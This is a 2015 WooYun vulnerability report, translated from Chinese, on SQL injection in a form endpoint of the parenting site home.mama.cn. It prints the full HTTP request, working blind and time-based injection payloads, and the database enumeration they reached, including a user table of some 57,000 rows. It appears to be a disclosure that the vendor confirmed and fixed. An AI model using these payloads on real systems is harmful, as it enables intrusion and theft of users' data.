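Vulnerability Summary

Bug ID: wooyun-2015-0116080

Title: Multiple injection points in one location on 妈妈网

Vendor: 妈妈网

Author: 路人甲

Submitted: 2015-05-26 11:43

Fixed: 2015-07-10 12:14

Published: 2015-07-10 12:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org (for questions or help, contact [email protected])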

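Vulnerability Details

Disclosure status:

2015-05-26: Details reported to the vendor; awaiting vendor handling
2015-05-26: Vendor confirmed; details disclosed to the vendor only
2015-06-05: Details disclosed to core white hats and experts in related fields
2015-06-15: Details disclosed to regular white hats
2015-06-25: Details disclosed to intern white hats
2015-07-10: Details disclosed to the public

Brief description:

233

Detailed description: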

POST /index.php?a=PublishPromotion&d=sub&g=Building HTTP/1.1
Content-Length: 225
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: home.mama.cn
Cookie: ***********************8
Host: home.mama.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

address=e&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077

All of these parameters have problems.

Proof of vulnerability:

---
Parameter: address (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: address=e' RLIKE (SELECT (CASE WHEN (4469=4469) THEN 0x65 ELSE 0x28 END)) AND 'ZayY'='ZayY&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 OR time-based blind (heavy query)
Payload: address=e' OR 9394=BENCHMARK(5000000,MD5(0x50706954)) AND 'yQSd'='yQSd&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
Database: home
[62 tables]
Database: home
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| home_user | 57368   |
+-----------+---------+

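Remediation:

check

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-05-26 12:13

Vendor reply:

Thanks

Latest status:

None yet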